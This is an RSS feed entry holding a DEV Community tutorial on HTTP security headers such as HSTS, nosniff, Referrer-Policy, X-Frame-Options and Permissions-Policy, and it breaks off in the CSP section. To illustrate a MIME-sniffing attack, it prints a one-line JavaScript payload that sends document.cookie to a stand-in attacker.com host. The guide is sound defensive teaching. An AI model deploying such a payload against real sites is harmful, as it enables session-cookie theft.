<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Harry Do</title>
    <description>The latest articles on DEV Community by Harry Do (@harry_do).</description>
    <link>https://dev.to/harry_do</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1050657%2F20f75d0c-4195-4d28-aec3-702934a8bfb3.png</url>
      <title>DEV Community: Harry Do</title>
      <link>https://dev.to/harry_do</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/harry_do"/>
    <language>en</language>
    <item>
      <title>HTTP Security Headers</title>
      <dc:creator>Harry Do</dc:creator>
      <pubDate>Mon, 27 Oct 2025 05:53:43 +0000</pubDate>
      <link>https://dev.to/harry_do/http-security-headers-protecting-your-web-applications-4edl</link>
      <guid>https://dev.to/harry_do/http-security-headers-protecting-your-web-applications-4edl</guid>
      <description>&lt;p&gt;In today's digital landscape, web application security is not optional—it's essential. As cyber threats continue to evolve and become more sophisticated, developers must employ multiple layers of defense to protect their applications and users. One of the most effective yet often overlooked security mechanisms is HTTP security headers.&lt;/p&gt;

&lt;h2&gt;
  
  
  I. What Are HTTP Security Headers?
&lt;/h2&gt;

&lt;p&gt;HTTP security headers are special response headers that web servers send to browsers, instructing them on how to behave when handling web content. Think of them as security directives that create an additional defensive layer by controlling how browsers process and display your web pages.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Quick Reference&lt;/strong&gt;: For a comprehensive reference, check out the &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html" rel="noopener noreferrer"&gt;OWASP HTTP Headers Cheat Sheet&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  II. Why Security Headers Matter
&lt;/h2&gt;

&lt;p&gt;Modern web applications face an ever-growing list of security threats. Without proper defenses, your application could be vulnerable to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cross-Site Scripting (XSS)&lt;/strong&gt;: Malicious scripts injected into your web pages&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Clickjacking&lt;/strong&gt;: Attackers tricking users into clicking hidden elements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Man-in-the-Middle (MITM) attacks&lt;/strong&gt;: Intercepting and modifying communications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data injection&lt;/strong&gt;: Unauthorized data being inserted into web pages&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Protocol downgrade attacks&lt;/strong&gt;: Forcing less secure communication protocols&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Security headers provide crucial protection by:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Controlling how browsers behave when rendering your content&lt;/li&gt;
&lt;li&gt;Enforcing secure communication protocols&lt;/li&gt;
&lt;li&gt;Preventing unauthorized content execution&lt;/li&gt;
&lt;li&gt;Protecting against various attack vectors&lt;/li&gt;
&lt;li&gt;Adding defense-in-depth to your security strategy&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Test Your Site's Security Headers
&lt;/h3&gt;

&lt;p&gt;Want to see how your site scores? Head over to &lt;a href="https://securityheaders.com/" rel="noopener noreferrer"&gt;securityheaders.com&lt;/a&gt; to scan your website's security headers. You might be surprised at what's missing!&lt;/p&gt;

&lt;h2&gt;
  
  
  III. Understanding Security Header Categories
&lt;/h2&gt;

&lt;p&gt;Not all security headers are created equal. Let's break them down by how commonly they're implemented and how complex they are to configure.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Essential Headers (You Should Have These)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Header&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Security Level&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Strict-Transport-Security (HSTS)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enforces HTTPS connections&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;X-Content-Type-Options&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Prevents MIME type sniffing&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Referrer-Policy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Controls referrer information sharing&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  The Recommended Headers (Most Sites Use These)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Header&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Security Level&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;X-Frame-Options&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Prevents clickjacking attacks&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Permissions-Policy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Controls browser features and APIs&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cross-Origin-Opener-Policy (COOP)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Controls cross-origin window access&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cross-Origin-Embedder-Policy (COEP)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Controls cross-origin resource loading&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  The Advanced Headers (Complex But Powerful)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Header&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Security Level&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Content-Security-Policy (CSP)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Controls which resources can be loaded and executed&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cross-Origin-Resource-Policy (CORP)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Controls cross-origin resource access&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  The Legacy Headers (Avoid These)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Header&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Security Level&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;X-XSS-Protection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enables browser XSS filtering (deprecated)&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  IV. Deep Dive: Configuring Each Header
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Strict-Transport-Security (HSTS)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What Problem Does It Solve?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HSTS protects against several critical vulnerabilities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Protocol Downgrade Attacks&lt;/strong&gt;: Prevents attackers from forcing connections to use HTTP instead of HTTPS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Man-in-the-Middle (MITM)&lt;/strong&gt;: Stops attackers from intercepting and modifying traffic by downgrading connections to plain HTTP&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cookie Hijacking&lt;/strong&gt;: Protects session cookies from being stolen over unencrypted connections&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;How It Works&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HSTS instructs browsers to always use HTTPS when communicating with your server. Once a browser receives this header, it will automatically upgrade all HTTP requests to HTTPS.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Configuration Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Directives:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;max-age&lt;/code&gt;: Duration (in seconds) to enforce HTTPS. &lt;code&gt;31536000&lt;/code&gt; equals one year.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;includeSubDomains&lt;/code&gt;: Applies the policy to all subdomains&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;preload&lt;/code&gt;: Indicates your site should be included in browser HSTS preload lists&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Common Pitfalls&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;First Visit Vulnerability&lt;/strong&gt;: The initial HTTP visit is still vulnerable before the header is received&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Subdomain Issues&lt;/strong&gt;: Misconfigured subdomains can break when &lt;code&gt;includeSubDomains&lt;/code&gt; is set&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Certificate Problems&lt;/strong&gt;: Invalid certificates can completely lock users out&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Preload List&lt;/strong&gt;: Once added, it's difficult to remove your site from browser preload lists&lt;/li&gt;
&lt;/ul&gt;
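&lt;p&gt;As a quick, framework-agnostic sketch (the &lt;code&gt;build_hsts&lt;/code&gt; helper name is hypothetical), the directives above can be assembled and sanity-checked programmatically:&lt;/p&gt;

```python
def build_hsts(max_age: int = 31536000,
               include_subdomains: bool = True,
               preload: bool = False) -> str:
    """Assemble a Strict-Transport-Security header value from its directives."""
    parts = [f"max-age={max_age}"]
    if include_subdomains:
        parts.append("includeSubDomains")
    if preload:
        # Submission to the browser preload list requires includeSubDomains
        # and a max-age of at least one year (31536000 seconds).
        if not include_subdomains or max_age < 31536000:
            raise ValueError("preload requires includeSubDomains and max-age >= 31536000")
        parts.append("preload")
    return "; ".join(parts)
```

For example, `build_hsts(preload=True)` produces the one-year policy shown above.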

&lt;h3&gt;
  
  
  2. X-Content-Type-Options
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What Problem Does It Solve?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MIME Sniffing Attacks&lt;/strong&gt;: Prevents browsers from interpreting files as different types than intended&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Script Execution&lt;/strong&gt;: Stops execution of scripts disguised as images or other content types&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Content Injection&lt;/strong&gt;: Blocks malicious content from being processed incorrectly&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Understanding MIME Sniffing Attacks&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Browsers have a feature called "MIME sniffing" where they examine the actual content of a file to determine its type, rather than trusting the Content-Type header sent by the server. This can be exploited by attackers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example Attack Scenario:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;An attacker uploads a malicious file disguised as an image:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="c"&gt;&amp;lt;!-- Looks innocent enough --&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;img&lt;/span&gt; &lt;span class="na"&gt;src=&lt;/span&gt;&lt;span class="s"&gt;"https://example.com/uploads/user-avatar.jpg"&lt;/span&gt; &lt;span class="na"&gt;alt=&lt;/span&gt;&lt;span class="s"&gt;"Profile Picture"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The file &lt;code&gt;user-avatar.jpg&lt;/code&gt; might actually contain JavaScript code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// This is malicious JavaScript disguised as an image&lt;/span&gt;
&lt;span class="nf"&gt;alert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;XSS Attack!&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;http://attacker.com/steal-data?cookie=&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cookie&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without &lt;code&gt;X-Content-Type-Options: nosniff&lt;/code&gt;, if the file is later loaded in a script context (for example via a &lt;code&gt;script&lt;/code&gt; tag), the browser might:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;See the file extension &lt;code&gt;.jpg&lt;/code&gt; and &lt;code&gt;Content-Type: image/jpeg&lt;/code&gt; header&lt;/li&gt;
&lt;li&gt;Examine the actual content and find JavaScript&lt;/li&gt;
&lt;li&gt;Decide "this looks like JavaScript" and execute it&lt;/li&gt;
&lt;li&gt;Run the malicious script, potentially stealing cookies or performing other attacks&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;How X-Content-Type-Options: nosniff Solves It&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you set this header, you're telling the browser:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Trust the Content-Type header - Don't try to guess the file type&lt;/li&gt;
&lt;li&gt;Don't MIME sniff - If the server says it's an image, treat it as an image&lt;/li&gt;
&lt;li&gt;Prevent content-type confusion - Don't execute scripts that are declared as images&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Configuration Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;X-Content-Type-Options: nosniff
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important Note&lt;/strong&gt;: The &lt;code&gt;nosniff&lt;/code&gt; directive specifically applies to &lt;code&gt;script&lt;/code&gt; and &lt;code&gt;style&lt;/code&gt; request destinations. It blocks requests when the destination is &lt;code&gt;script&lt;/code&gt; and the MIME type is not a JavaScript type, or when the destination is &lt;code&gt;style&lt;/code&gt; and the MIME type is not &lt;code&gt;text/css&lt;/code&gt;. While this provides critical protection for the most common XSS vectors, it doesn't prevent MIME sniffing for all content types.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Common Pitfalls&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Legacy content&lt;/strong&gt; may rely on MIME sniffing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File uploads&lt;/strong&gt; with incorrect MIME types may not display properly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Browser compatibility&lt;/strong&gt; is excellent; all modern browsers honor &lt;code&gt;nosniff&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
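&lt;p&gt;On the serving side, one minimal sketch (assuming a generic upload endpoint; the function name is illustrative) is to pair &lt;code&gt;nosniff&lt;/code&gt; with an explicit &lt;code&gt;Content-Type&lt;/code&gt;, forcing a download for anything unrecognized:&lt;/p&gt;

```python
import mimetypes

def upload_response_headers(filename: str) -> dict:
    """Headers for serving a user-uploaded file: explicit type plus nosniff."""
    content_type, _ = mimetypes.guess_type(filename)
    if content_type is None:
        # Unknown type: force a download instead of letting the browser guess
        content_type = "application/octet-stream"
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
    }
```

With these headers, the disguised `user-avatar.jpg` from the scenario above is treated strictly as an image.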

&lt;h3&gt;
  
  
  3. Referrer-Policy
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What Problem Does It Solve?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Information Leakage&lt;/strong&gt;: Prevents sensitive URLs from being exposed in referrer headers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Privacy Violations&lt;/strong&gt;: Stops tracking users across sites&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data Exposure&lt;/strong&gt;: Protects sensitive parameters in referrer URLs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Understanding Data Exposure Through Referrers&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Many applications pass sensitive data through URL parameters, which gets exposed via referrer headers when users navigate to other sites.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Common Sensitive Data in URLs:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="c"&gt;&amp;lt;!-- User profiles --&amp;gt;&lt;/span&gt;
https://profile.com/user/12345?name=John+Doe&lt;span class="err"&gt;&amp;amp;&lt;/span&gt;email=john@example.com&lt;span class="err"&gt;&amp;amp;&lt;/span&gt;phone=555-1234

&lt;span class="c"&gt;&amp;lt;!-- Medical records --&amp;gt;&lt;/span&gt;
https://clinic.com/patient/789?diagnosis=diabetes&lt;span class="err"&gt;&amp;amp;&lt;/span&gt;medication=insulin&lt;span class="err"&gt;&amp;amp;&lt;/span&gt;age=45

&lt;span class="c"&gt;&amp;lt;!-- Financial data --&amp;gt;&lt;/span&gt;
https://bank.com/account?balance=100000&lt;span class="err"&gt;&amp;amp;&lt;/span&gt;credit_score=750&lt;span class="err"&gt;&amp;amp;&lt;/span&gt;ssn=123-45-6789
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;How It Works&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Referrer-Policy header controls what information is included in the &lt;code&gt;Referer&lt;/code&gt; header when navigating away from your site.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Available Policy Options:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;no-referrer&lt;/code&gt;: Never send referrer information&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;no-referrer-when-downgrade&lt;/code&gt;: Send the full URL unless navigating from HTTPS to HTTP&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;origin&lt;/code&gt;: Send only the origin (domain), not the full URL&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;origin-when-cross-origin&lt;/code&gt;: Send full URL for same-origin, only origin for cross-origin&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;same-origin&lt;/code&gt;: Send referrer only for same-origin requests&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;strict-origin&lt;/code&gt;: Send only the origin, and nothing on an HTTPS→HTTP downgrade&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;strict-origin-when-cross-origin&lt;/code&gt;: Send the full URL for same-origin requests, only the origin for cross-origin requests, and nothing on an HTTPS→HTTP downgrade (recommended, &lt;strong&gt;this is the default in modern browsers&lt;/strong&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;unsafe-url&lt;/code&gt;: Always send full referrer (not recommended)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Configuration Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;Referrer-Policy: strict-origin-when-cross-origin
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: &lt;code&gt;strict-origin-when-cross-origin&lt;/code&gt; is the default policy in modern browsers if no Referrer-Policy header is specified. Setting it explicitly ensures consistent behavior across all browsers and makes your security policy clear.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Common Pitfalls&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Analytics tracking&lt;/strong&gt; may be affected by restrictive policies&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Legacy systems&lt;/strong&gt; may depend on referrer information&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Debugging&lt;/strong&gt; becomes more difficult without full referrer data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Browser support&lt;/strong&gt; varies for different policies&lt;/li&gt;
&lt;/ul&gt;
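&lt;p&gt;The policy's behavior can be modeled in a few lines; this simplified sketch (the &lt;code&gt;referrer_for&lt;/code&gt; name is hypothetical, and real browsers also strip fragments and credentials) shows what &lt;code&gt;strict-origin-when-cross-origin&lt;/code&gt; would send:&lt;/p&gt;

```python
from typing import Optional
from urllib.parse import urlsplit

def referrer_for(current_url: str, destination_url: str) -> Optional[str]:
    """Model the Referer value under strict-origin-when-cross-origin."""
    src, dst = urlsplit(current_url), urlsplit(destination_url)
    src_origin = f"{src.scheme}://{src.netloc}"
    dst_origin = f"{dst.scheme}://{dst.netloc}"
    if src.scheme == "https" and dst.scheme == "http":
        return None                 # downgrade: send nothing
    if src_origin == dst_origin:
        return current_url          # same-origin: full URL (simplified)
    return src_origin + "/"         # cross-origin: origin only
```

Note how the sensitive query string from the clinic example above never leaves the site's origin.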

&lt;h3&gt;
  
  
  &lt;strong&gt;4. X-Frame-Options&lt;/strong&gt;
&lt;/h3&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Security Risk Scenario&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Clickjacking&lt;/strong&gt;: Malicious sites embedding your content in invisible frames
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;UI Redressing&lt;/strong&gt;: Tricking users into performing unintended actions
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Social Engineering&lt;/strong&gt;: Overlaying malicious content on legitimate pages&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;How It Solves It&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Controls whether browsers can display the page in a frame:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;DENY&lt;/code&gt;: Completely prevents framing
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;SAMEORIGIN&lt;/code&gt;: Allows framing only from same origin
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ALLOW-FROM uri&lt;/code&gt;: Allows framing from specific URI (deprecated)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Detailed Information&lt;/strong&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM https://trusted-site.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;strong&gt;5. Permissions-Policy&lt;/strong&gt;
&lt;/h3&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Security Risk Scenario&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Feature Abuse&lt;/strong&gt;: Unauthorized use of browser APIs
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Privacy Violations&lt;/strong&gt;: Access to sensitive device features
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Resource Consumption&lt;/strong&gt;: Excessive use of device resources&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;How It Solves It&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Controls which browser features and APIs can be used:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;camera&lt;/code&gt;: Camera access
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;microphone&lt;/code&gt;: Microphone access
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;geolocation&lt;/code&gt;: Location access
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;payment&lt;/code&gt;: Payment Request API
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;usb&lt;/code&gt;: USB device access
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;magnetometer&lt;/code&gt;: Magnetometer access
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;gyroscope&lt;/code&gt;: Gyroscope access
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;accelerometer&lt;/code&gt;: Accelerometer access&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Detailed Information&lt;/strong&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;Permissions-Policy: camera=(), microphone=(), geolocation=(self), payment=(self "https://trusted-payment.com")
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
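&lt;p&gt;Because the header has a regular structure, it can be generated rather than hand-written; a hypothetical serializer sketch (handling only &lt;code&gt;self&lt;/code&gt; and quoted origin entries):&lt;/p&gt;

```python
def permissions_policy(features: dict) -> str:
    """Serialize {feature: allowlist} into a Permissions-Policy value.

    An empty allowlist means the feature is denied everywhere; entries are
    the keyword 'self' or origin URLs (which must be double-quoted).
    """
    parts = []
    for feature, allowlist in features.items():
        items = " ".join(a if a == "self" else f'"{a}"' for a in allowlist)
        parts.append(f"{feature}=({items})")
    return ", ".join(parts)
```

For instance, `{"camera": [], "geolocation": ["self"]}` serializes to `camera=(), geolocation=(self)`, matching the example above.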



&lt;h3&gt;
  
  
  &lt;strong&gt;Common Issues&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Feature detection&lt;/strong&gt; may not work as expected
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Third-party widgets&lt;/strong&gt; may break
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Progressive enhancement&lt;/strong&gt; requires careful handling
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Browser support&lt;/strong&gt; is still evolving&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;6. Content-Security-Policy (CSP)&lt;/strong&gt;
&lt;/h3&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Security Risk Scenario&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;XSS Attacks&lt;/strong&gt;: Malicious scripts injected through user input, third-party libraries, or compromised dependencies
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data Exfiltration&lt;/strong&gt;: Unauthorized scripts sending sensitive data to external domains
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Malicious Redirects&lt;/strong&gt;: Scripts redirecting users to phishing sites&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;How CSP Solves It&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;CSP acts as an allowlist mechanism that:&lt;/p&gt;

